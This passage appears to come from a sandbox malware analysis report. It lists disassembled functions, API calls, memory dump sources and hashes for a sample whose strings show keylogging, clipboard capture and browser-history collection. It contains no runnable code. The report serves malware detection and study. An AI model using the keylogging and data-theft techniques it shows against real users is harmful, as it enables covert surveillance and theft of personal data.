                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: MetricsSystem
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 4116985748-0
                                                                                                                                                                                          • Opcode ID: 8b2ff39deab7576a70af653f9587165294241c64ae6cb72593d5c84c69c70645
                                                                                                                                                                                          • Instruction ID: 6744feb7cdfd49c22b455278afc33263dc9457639b29de48414e7d7e72bd5374
                                                                                                                                                                                          • Opcode Fuzzy Hash: 8b2ff39deab7576a70af653f9587165294241c64ae6cb72593d5c84c69c70645
                                                                                                                                                                                          • Instruction Fuzzy Hash: 99F04FA2B043955BD394DA75CC44A2F6BD6AFC4260F2048BEE6098B381EEB4DC058B91
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 005C9D13 Relevance: 6.0, APIs: 4, Instructions: 14COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 005C9D13
                                                                                                                                                                                          • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 005C9D18
                                                                                                                                                                                          • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 005C9D1D
                                                                                                                                                                                            • Part of subcall function 005CB21C: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 005CB22D
                                                                                                                                                                                          • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 005C9D32
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3646905411.0000000000590000.00000040.00000400.00020000.00000000.sdmp, Offset: 00590000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_590000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1761009282-0
                                                                                                                                                                                          • Opcode ID: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                                                                                                                                                                          • Instruction ID: 0a9096911c0944c4a10d0bcf52f8340a98e95cf27e9ab1d1de8c4966a733bb33
                                                                                                                                                                                          • Opcode Fuzzy Hash: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                                                                                                                                                                          • Instruction Fuzzy Hash: E0C0010C0006466C2C103AF1221FFAE9F407DE2B86FA46A8DB8A23A403AA060D5A6022
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 005E4B65 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 268COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3646905411.0000000000590000.00000040.00000400.00020000.00000000.sdmp, Offset: 00590000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_590000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: __freea
                                                                                                                                                                                          • String ID: >N^
                                                                                                                                                                                          • API String ID: 240046367-865931248
                                                                                                                                                                                          • Opcode ID: fb6195c260b9ae5d4324619eca1f95c452dc13a98459a94436f4153b7f964d62
                                                                                                                                                                                          • Instruction ID: 7c49aa9249258e033b1fa4775ad335b2f847e284416e358fc630403511f5a804
                                                                                                                                                                                          • Opcode Fuzzy Hash: fb6195c260b9ae5d4324619eca1f95c452dc13a98459a94436f4153b7f964d62
                                                                                                                                                                                          • Instruction Fuzzy Hash: 7991B171E002969ADF288FA6CD85AEEBFB9BB49310F184659E885E7241D735DC40CF60
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 005E2ABA Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 236COMMONLIBRARYCODE
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 005D8FF7: _free.LIBCMT ref: 005D902E
                                                                                                                                                                                            • Part of subcall function 005D8FF7: _abort.LIBCMT ref: 005D9075
                                                                                                                                                                                          • _wcschr.LIBVCRUNTIME ref: 005E2C2C
                                                                                                                                                                                          • _wcschr.LIBVCRUNTIME ref: 005E2C3A
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3646905411.0000000000590000.00000040.00000400.00020000.00000000.sdmp, Offset: 00590000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_590000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _wcschr$_abort_free
                                                                                                                                                                                          • String ID: UX]
                                                                                                                                                                                          • API String ID: 2269257601-4069445468
                                                                                                                                                                                          • Opcode ID: 7ea90a810ccb8eded513053f15f94d45dc96679ac5d2c45bddb92c1ff4a69e8d
                                                                                                                                                                                          • Instruction ID: 7c62ca9e638cbb0aa022fbd1713b438e5fd6af329af7ec66704a85a095b22388
                                                                                                                                                                                          • Opcode Fuzzy Hash: 7ea90a810ccb8eded513053f15f94d45dc96679ac5d2c45bddb92c1ff4a69e8d
                                                                                                                                                                                          • Instruction Fuzzy Hash: A961EB72600247AAD72CAF76CC4ABBA7BACFF44300F14446AF989D7185EA70DD41C7A4
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 005995EE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 186COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • __EH_prolog.LIBCMT ref: 005995F3
                                                                                                                                                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 005996D4
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3646905411.0000000000590000.00000040.00000400.00020000.00000000.sdmp, Offset: 00590000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_590000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Exception@8H_prologThrow
                                                                                                                                                                                          • String ID: hdF
                                                                                                                                                                                          • API String ID: 3222999186-665520524
                                                                                                                                                                                          • Opcode ID: 343675e76b0a0f9536e7689d5bfc322d86527155193a82fc771824cafc66db2c
                                                                                                                                                                                          • Instruction ID: 379a1acd38d4ce2fff90b014f9c69876fc7e4afc0ff65bc1f15edb1d8b405283
                                                                                                                                                                                          • Opcode Fuzzy Hash: 343675e76b0a0f9536e7689d5bfc322d86527155193a82fc771824cafc66db2c
                                                                                                                                                                                          • Instruction Fuzzy Hash: E2513C7290020ABBCF14FBA4DD5A9ED7F68BF91300F50015DB80696192EF349F49CB91
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 146463F0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 168COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • _free.LIBCMT ref: 1464655C
                                                                                                                                                                                            • Part of subcall function 146462BC: IsProcessorFeaturePresent.KERNEL32(00000017,146462AB,00000000,?,?,?,?,00000016,?,?,146462B8,00000000,00000000,00000000,00000000,00000000), ref: 146462BE
                                                                                                                                                                                            • Part of subcall function 146462BC: GetCurrentProcess.KERNEL32(C0000417), ref: 146462E0
                                                                                                                                                                                            • Part of subcall function 146462BC: TerminateProcess.KERNEL32(00000000), ref: 146462E7
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3665605507.0000000014641000.00000040.00001000.00020000.00000000.sdmp, Offset: 14640000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3665584194.0000000014640000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3665605507.0000000014656000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_14640000_wkrriuhD.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                                                                                                                                                                          • String ID: *?$.
                                                                                                                                                                                          • API String ID: 2667617558-3972193922
                                                                                                                                                                                          • Opcode ID: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                                                                                                                                                                                          • Instruction ID: 71d027ee24beb54f69d52998898cc7061112bb0439d6b8daf87f3a0eeac37e73
                                                                                                                                                                                          • Opcode Fuzzy Hash: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                                                                                                                                                                                          • Instruction Fuzzy Hash: EB518575E0020ADFDF05CFA8C8406ADBBB5EF68318F388169D558E7345D639AE018B54
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 005DC19E Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 152COMMONLIBRARYCODE
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3646905411.0000000000590000.00000040.00000400.00020000.00000000.sdmp, Offset: 00590000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_590000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: __fassign
                                                                                                                                                                                          • String ID: PkGNG
                                                                                                                                                                                          • API String ID: 3965848254-263838557
                                                                                                                                                                                          • Opcode ID: 0bfd670419a30e70b2122a04c0ff37dc7c92f96e788d8b5757dd12d671b03cbd
                                                                                                                                                                                          • Instruction ID: 2ab1cf02f251a95dd18b82d38afd7d446144d0a0d164f0c26ee8b34f67fb4faa
                                                                                                                                                                                          • Opcode Fuzzy Hash: 0bfd670419a30e70b2122a04c0ff37dc7c92f96e788d8b5757dd12d671b03cbd
                                                                                                                                                                                          • Instruction Fuzzy Hash: 0B51607190024AAFDB20CFACD885AEEBFF4FB09310F14856BE955E7391D6309941CB65
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 005ACDFD Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 139COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3646905411.0000000000590000.00000040.00000400.00020000.00000000.sdmp, Offset: 00590000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_590000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _memcmp_wcslen
                                                                                                                                                                                          • String ID: ?
                                                                                                                                                                                          • API String ID: 1846113162-1684325040
                                                                                                                                                                                          • Opcode ID: abe7e308a1a6702f98718e9be80ca678ae2d2d31c1c14d85f2c6eaae61ca29ed
                                                                                                                                                                                          • Instruction ID: 76a1c639bec36f43b1f9c7f2cc1e9a016f453073781b491185dc4ceb0867ff5c
                                                                                                                                                                                          • Opcode Fuzzy Hash: abe7e308a1a6702f98718e9be80ca678ae2d2d31c1c14d85f2c6eaae61ca29ed
                                                                                                                                                                                          • Instruction Fuzzy Hash: 21416F71508316EFDB20DFA4D848AAFBFECBB99751F00092AF555C2161EB74C948CB92
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1233404C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 93sleepCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 12334066
                                                                                                                                                                                            • Part of subcall function 1234B978: GetCurrentProcessId.KERNEL32(00000000,771B3530,00000000,?,?,?,?,12396468,1233D20D,.vbs,?,?,?,?,?,123A52F0), ref: 1234B99F
                                                                                                                                                                                            • Part of subcall function 12348568: CloseHandle.KERNEL32(123340F5,?,?,123340F5,12395E74), ref: 1234857E
                                                                                                                                                                                            • Part of subcall function 12348568: CloseHandle.KERNEL32(12395E74,?,?,123340F5,12395E74), ref: 12348587
                                                                                                                                                                                            • Part of subcall function 1234C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,1233A843), ref: 1234C49E
                                                                                                                                                                                          • Sleep.KERNEL32(000000FA,12395E74), ref: 12334138
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • /sort "Visit Time" /stext ", xrefs: 123340B2
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                                                                                                                                                                                          • String ID: /sort "Visit Time" /stext "
                                                                                                                                                                                          • API String ID: 368326130-1573945896
                                                                                                                                                                                          • Opcode ID: 397a6cced3a4d4c9cf7d355418eda07bb8a790510c660b27a52c9a1eb619ad88
                                                                                                                                                                                          • Instruction ID: 37d9114549791177351191eea28ee58e43f7a6f135f5987bcf0d3e02466e645c
                                                                                                                                                                                          • Opcode Fuzzy Hash: 397a6cced3a4d4c9cf7d355418eda07bb8a790510c660b27a52c9a1eb619ad88
                                                                                                                                                                                          • Instruction Fuzzy Hash: 9A31413B9102185BCB66E7B4DC949FE7779AF90302F400165D146E7194EF206F4ACB91
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00592AED Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 89COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3646905411.0000000000590000.00000040.00000400.00020000.00000000.sdmp, Offset: 00590000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_590000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _strftime
                                                                                                                                                                                          • String ID: dMG$|MG
                                                                                                                                                                                          • API String ID: 1867682108-1683252805
                                                                                                                                                                                          • Opcode ID: bbdb414fb79269bf773295af42d5df5de67eea351094c48e52f104940b22c49b
                                                                                                                                                                                          • Instruction ID: c25a9a5173f561076fd4333ba925af670d8c373e999510ed5d033984224649cf
                                                                                                                                                                                          • Opcode Fuzzy Hash: bbdb414fb79269bf773295af42d5df5de67eea351094c48e52f104940b22c49b
                                                                                                                                                                                          • Instruction Fuzzy Hash: 4E315E31504302AFDB24EB60DD5AAAE7BA8FBD4300F40453DF149821E1EF709E49CB5A
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1233B748 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 12364770: __onexit.LIBCMT ref: 12364776
                                                                                                                                                                                          • __Init_thread_footer.LIBCMT ref: 1233B797
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Init_thread_footer__onexit
                                                                                                                                                                                          • String ID: [End of clipboard]$[Text copied to clipboard]
                                                                                                                                                                                          • API String ID: 1881088180-3686566968
                                                                                                                                                                                          • Opcode ID: ac1a759854e643147470ffe83c858acb222773e7e94efd10205d04e87054609b
                                                                                                                                                                                          • Instruction ID: ce4a5f844ff48fb29387deccc0aeee737ed0932e4d452ef378064df1263ecadb
                                                                                                                                                                                          • Opcode Fuzzy Hash: ac1a759854e643147470ffe83c858acb222773e7e94efd10205d04e87054609b
                                                                                                                                                                                          • Instruction Fuzzy Hash: B821A73B9002194ECB69E774D890DFDB77AAF50312F50052AD50697194FF347F4ACA90
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 005A70C6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 79COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • _wcslen.LIBCMT ref: 005A70D7
                                                                                                                                                                                            • Part of subcall function 0059ABC6: _wcslen.LIBCMT ref: 0059ABDF
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3646905411.0000000000590000.00000040.00000400.00020000.00000000.sdmp, Offset: 00590000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_590000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _wcslen
                                                                                                                                                                                          • String ID: !D@$PG
                                                                                                                                                                                          • API String ID: 176396367-1987221222
                                                                                                                                                                                          • Opcode ID: 3229767f42b224c22e38ab05f87ced9dbd25ea478007aec8b0515c8cef1bdfe3
                                                                                                                                                                                          • Instruction ID: 9cab077bf046a24f4c5f39c5ddc59979f1098d9878313069d0439688a53d3919
                                                                                                                                                                                          • Opcode Fuzzy Hash: 3229767f42b224c22e38ab05f87ced9dbd25ea478007aec8b0515c8cef1bdfe3
                                                                                                                                                                                          • Instruction Fuzzy Hash: 6C11D2207442433BDE1C77709C2AFBE2A8BBBD1300F50842EF44A8F6E2DEA80C469215
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 005953E9 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 74COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3646905411.0000000000590000.00000040.00000400.00020000.00000000.sdmp, Offset: 00590000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_590000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: H_prolog
                                                                                                                                                                                          • String ID: NG$}E
                                                                                                                                                                                          • API String ID: 3519838083-2251168990
                                                                                                                                                                                          • Opcode ID: 531294bc55fe6296708d9916624f17236c631622ca51f748c31d8835be279a7a
                                                                                                                                                                                          • Instruction ID: 18ef6193023b93b2001c4837adbf78fa7b235d1f44383af6b86f70fb50bc55b1
                                                                                                                                                                                          • Opcode Fuzzy Hash: 531294bc55fe6296708d9916624f17236c631622ca51f748c31d8835be279a7a
                                                                                                                                                                                          • Instruction Fuzzy Hash: DC215336D001099BDF15EBA4D957AFEBB76FF80310F60812AF515A2191DF341E058B40
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 146416AA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 61COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3665605507.0000000014641000.00000040.00001000.00020000.00000000.sdmp, Offset: 14640000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3665584194.0000000014640000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3665605507.0000000014656000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_14640000_wkrriuhD.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _strlen
                                                                                                                                                                                          • String ID: : $Se.
                                                                                                                                                                                          • API String ID: 4218353326-4089948878
                                                                                                                                                                                          • Opcode ID: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                                                                                                                                                          • Instruction ID: 49ae106f25e449103ceba9b15f5dd1f4556a04309f373c75336c8a38c81c8876
                                                                                                                                                                                          • Opcode Fuzzy Hash: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                                                                                                                                                          • Instruction Fuzzy Hash: EC110A75A00389AEDF11CFA8D841BDDFBFCEF19208F244056E645E7252E6706B02C765
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 005982DF Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 56COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3646905411.0000000000590000.00000040.00000400.00020000.00000000.sdmp, Offset: 00590000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_590000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _wcslen
                                                                                                                                                                                          • String ID: $$cF
                                                                                                                                                                                          • API String ID: 176396367-3386849937
                                                                                                                                                                                          • Opcode ID: a3f0521951bb9342bb967e70cc438d07290dcccf7f3efa3b8b817ec6fb2293fa
                                                                                                                                                                                          • Instruction ID: fd719cc48284dd5d84fcf129696db2a4c355d4fde6e48cfede0ea8cd22c2193a
                                                                                                                                                                                          • Opcode Fuzzy Hash: a3f0521951bb9342bb967e70cc438d07290dcccf7f3efa3b8b817ec6fb2293fa
                                                                                                                                                                                          • Instruction Fuzzy Hash: 9111C671914219ABCF10E6989C49FDEBBBCAF48710F250067F804B3241EA788A448A66
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1233B051 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 1233B164: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 1233B172
                                                                                                                                                                                            • Part of subcall function 1233B164: wsprintfW.USER32 ref: 1233B1F3
                                                                                                                                                                                            • Part of subcall function 1234B4EF: GetLocalTime.KERNEL32(00000000), ref: 1234B509
                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 1233B0B4
                                                                                                                                                                                          • UnhookWindowsHookEx.USER32 ref: 1233B0C7
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                                                                                                                                                                                          • String ID: Online Keylogger Stopped
                                                                                                                                                                                          • API String ID: 1623830855-1496645233
                                                                                                                                                                                          • Opcode ID: 0ca69f09bdd1a2910762349e98f7bf3dc20463767c10de209a55e024eb12998e
                                                                                                                                                                                          • Instruction ID: 195fde748c64d5dee48657937eb66e762bcb2b8b2804fed3eeb8f0dbb2ca571d
                                                                                                                                                                                          • Opcode Fuzzy Hash: 0ca69f09bdd1a2910762349e98f7bf3dc20463767c10de209a55e024eb12998e
                                                                                                                                                                                          • Instruction Fuzzy Hash: 1D01283BA002445BDB777B34CC0A3BE7BB6AB82302F40055CD486065D5FB712A49D7D2
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 14641EDE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 14642903
                                                                                                                                                                                            • Part of subcall function 146435D2: RaiseException.KERNEL32(?,?,?,14642925,00000000,00000000,00000000,?,?,?,?,?,14642925,?,146521B8), ref: 14643632
                                                                                                                                                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 14642920
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3665605507.0000000014641000.00000040.00001000.00020000.00000000.sdmp, Offset: 14640000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3665584194.0000000014640000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3665605507.0000000014656000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_14640000_wkrriuhD.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Exception@8Throw$ExceptionRaise
                                                                                                                                                                                          • String ID: Unknown exception
                                                                                                                                                                                          • API String ID: 3476068407-410509341
                                                                                                                                                                                          • Opcode ID: b44aed1bafc873f8cc5f07ccf3280c10b9ea5bcd0f62386202f38d61d2ef37a4
                                                                                                                                                                                          • Instruction ID: 6d2d7967ebad6924780a51402dee037bb3723edb2de536b80faa876b9278052c
                                                                                                                                                                                          • Opcode Fuzzy Hash: b44aed1bafc873f8cc5f07ccf3280c10b9ea5bcd0f62386202f38d61d2ef37a4
                                                                                                                                                                                          • Instruction Fuzzy Hash: F5F0C838A0020D779F05ABE5EC4499E776C6F206DCB784570FA14A6890EF31F95AC9D4
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 005D456E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 35COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3646905411.0000000000590000.00000040.00000400.00020000.00000000.sdmp, Offset: 00590000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_590000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _free
                                                                                                                                                                                          • String ID: $G
